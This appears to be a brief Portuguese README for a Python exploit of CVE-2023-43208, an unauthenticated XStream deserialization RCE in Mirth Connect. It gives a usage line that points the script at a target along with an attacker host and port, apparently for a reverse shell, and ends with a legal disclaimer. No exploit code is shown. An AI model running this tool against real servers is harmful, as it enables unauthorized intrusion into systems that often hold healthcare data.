
Implementação em Python do CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
Este exploit aproveita uma vulnerabilidade crítica de desserialização no motor XStream do Mirth Connect. Ela decorre de uma correção incompleta para CVE-2023-37679, permitindo a execução arbitrária de código não autenticada em todas as versões anteriores à 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Este script de exploit destina-se estritamente a fins educacionais e auditorias de segurança autorizadas para auxiliar defensores na mitigação da CVE-2023-43208; qualquer uso desta ferramenta contra alvos não autorizados é ilegal e de responsabilidade exclusiva do usuário final. O autor fornece este software "como está" sem quaisquer garantias, isenta-se de toda responsabilidade por uso indevido ou danos potenciais, e não endossa ou incentiva atividades não autorizadas. Use por sua conta e risco e apenas em conformidade com as leis aplicáveis.